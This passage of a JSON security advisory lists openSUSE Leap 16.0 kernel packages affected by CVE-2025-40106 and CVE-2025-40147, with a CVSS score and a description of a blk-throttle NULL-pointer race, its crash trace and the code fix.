"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-40106"
},
{
"cve": "CVE-2025-40147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-throttle: fix access race during throttle policy activation\n\nOn repeated cold boots we occasionally hit a NULL pointer crash in\nblk_should_throtl() when throttling is consulted before the throttle\npolicy is fully enabled for the queue. Checking only q-\u003etd != NULL is\ninsufficient during early initialization, so blkg_to_pd() for the\nthrottle policy can still return NULL and blkg_to_tg() becomes NULL,\nwhich later gets dereferenced.\n\n Unable to handle kernel NULL pointer dereference\n at virtual address 0000000000000156\n ...\n pc : submit_bio_noacct+0x14c/0x4c8\n lr : submit_bio_noacct+0x48/0x4c8\n sp : ffff800087f0b690\n x29: ffff800087f0b690 x28: 0000000000005f90 x27: ffff00068af393c0\n x26: 0000000000080000 x25: 000000000002fbc0 x24: ffff000684ddcc70\n x23: 0000000000000000 x22: 0000000000000000 x21: 0000000000000000\n x20: 0000000000080000 x19: ffff000684ddcd08 x18: ffffffffffffffff\n x17: 0000000000000000 x16: ffff80008132a550 x15: 0000ffff98020fff\n x14: 0000000000000000 x13: 1fffe000d11d7021 x12: ffff000688eb810c\n x11: ffff00077ec4bb80 x10: ffff000688dcb720 x9 : ffff80008068ef60\n x8 : 00000a6fb8a86e85 x7 : 000000000000111e x6 : 0000000000000002\n x5 : 0000000000000246 x4 : 0000000000015cff x3 : 0000000000394500\n x2 : ffff000682e35e40 x1 : 0000000000364940 x0 : 000000000000001a\n Call trace:\n submit_bio_noacct+0x14c/0x4c8\n verity_map+0x178/0x2c8\n __map_bio+0x228/0x250\n dm_submit_bio+0x1c4/0x678\n __submit_bio+0x170/0x230\n submit_bio_noacct_nocheck+0x16c/0x388\n submit_bio_noacct+0x16c/0x4c8\n submit_bio+0xb4/0x210\n f2fs_submit_read_bio+0x4c/0xf0\n f2fs_mpage_readpages+0x3b0/0x5f0\n f2fs_readahead+0x90/0xe8\n\nTighten blk_throtl_activated() to also require that the throttle policy\nbit is set on the queue:\n\n return q-\u003etd != NULL \u0026\u0026\n test_bit(blkcg_policy_throtl.plid, q-\u003eblkcg_pols);\n\nThis prevents blk_should_throtl() from accessing throttle group state\nuntil policy data has been attached to blkgs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
